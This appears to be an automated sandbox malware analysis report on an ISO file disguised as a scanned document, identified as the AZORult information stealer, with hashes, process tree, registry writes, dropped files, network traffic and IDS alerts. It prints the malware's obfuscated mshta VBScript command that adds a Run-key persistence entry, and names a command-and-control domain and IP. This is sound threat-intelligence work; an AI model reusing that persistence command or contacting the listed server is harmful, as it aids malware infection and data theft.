| File name: | 6d1c1c922da4c1c7dd78bfad3930c257.iso |
| Full analysis: | https://app.any.run/tasks/5d50876d-a7a0-4ac8-ba9d-db83a6c40fba |
| Verdict: | Malicious activity |
| Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
| Analysis date: | December 06, 2018, 07:59:50 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-iso9660-image |
| File info: | ISO 9660 CD-ROM filesystem data '2018-0612_ScannedCopy_0746326589' |
| MD5: | 6D1C1C922DA4C1C7DD78BFAD3930C257 |
| SHA1: | 3DC542527B4CEA7F4939C815C2D1C5BF2EC66DF4 |
| SHA256: | 2358572417EB814C39EDFF9D63C910525756AE82D47438463737937B939DE48E |
| SSDEEP: | 6144:cBO7Ef/7Q/11ppBseSxPbqimLKVSQtWkXxQv6tYfoCRjVbd614f0Us+1MsN:cBrg11pjsHdOGWKI6tn |
| .iso | | | ISO 9660 CD image (27.6) |
|---|---|---|
| .atn | | | Photoshop Action (27.1) |
| .gmc | | | Game Music Creator Music (6.1) |
| System: | Win32 |
|---|---|
| VolumeName: | 2018-0612_ScannedCopy_0746326589 |
| VolumeBlockCount: | 270 |
| VolumeBlockSize: | 2048 |
| RootDirectoryCreateDate: | 2018:12:06 07:47:06+01:00 |
| Software: | PowerISO |
| VolumeCreateDate: | 2018:12:06 07:47:06.00+01:00 |
| VolumeModifyDate: | 2018:12:06 07:47:06.00+01:00 |
| VolumeSize: | 540 kB |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 912 | "C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe" | C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe | explorer.exe | ||||||||||||
User: admin Company: SLUBBY Integrity Level: MEDIUM Description: VuRoFenceen Exit code: 0 Version: 5.07.0009 Modules
| |||||||||||||||
| 2372 | "C:\Users\admin\AppData\Local\Temp\Konsumerede.exe" | C:\Users\admin\AppData\Local\Temp\Konsumerede.exe | 2018-0612_ScannedCopy_0746326589_pdf.exe | ||||||||||||
User: admin Company: SLUBBY Integrity Level: MEDIUM Description: VuRoFenceen Exit code: 0 Version: 5.07.0009 Modules
| |||||||||||||||
| 2820 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6d1c1c922da4c1c7dd78bfad3930c257.iso" | C:\Program Files\WinRAR\WinRAR.exe | rundll32.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 Modules
| |||||||||||||||
| 2928 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\6d1c1c922da4c1c7dd78bfad3930c257.iso | C:\Windows\system32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3352 | "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMKLAAS"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\Konsumerede.exe"",""REG_SZ"" : window.close") | C:\Windows\System32\mshta.exe | 2018-0612_ScannedCopy_0746326589_pdf.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E |
| Operation: | write | Name: | @C:\Windows\System32\isoburn.exe,-350 |
Value: Disc Image File | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.iso\OpenWithProgids |
| Operation: | write | Name: | Windows.IsoFile |
Value: | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E |
| Operation: | write | Name: | @%SystemRoot%\System32\isoburn.exe,-352 |
Value: Windows Disc Image Burner | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\Windows\System32\isoburn.exe |
Value: Windows Disc Image Burner | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\Program Files\WinRAR\WinRAR.exe |
Value: WinRAR archiver | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
Value: Adobe Acrobat Reader DC | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\Windows\eHome\ehshell.exe |
Value: Windows Media Center | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\Windows\system32\mspaint.exe |
Value: Paint | |||
| (PID) Process: | (2928) rundll32.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\Windows\system32\NOTEPAD.EXE |
Value: Notepad | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\VirtualStore\Windows\Borins | text | |
MD5:— | SHA256:— | |||
| 912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\Temp\~DF102DC8A321753A4C.TMP | binary | |
MD5:— | SHA256:— | |||
| 2372 | Konsumerede.exe | C:\Users\admin\AppData\Local\VirtualStore\Windows\Borins | text | |
MD5:— | SHA256:— | |||
| 2820 | WinRAR.exe | C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe | executable | |
MD5:— | SHA256:— | |||
| 912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\Temp\Konsumerede.exe | executable | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2372 | Konsumerede.exe | POST | — | 23.229.191.64:80 | http://cpinfo.partnership-international.com/index.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2372 | Konsumerede.exe | 23.229.191.64:80 | cpinfo.partnership-international.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
|---|---|---|
cpinfo.partnership-international.com |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
2372 | Konsumerede.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
2372 | Konsumerede.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
2372 | Konsumerede.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |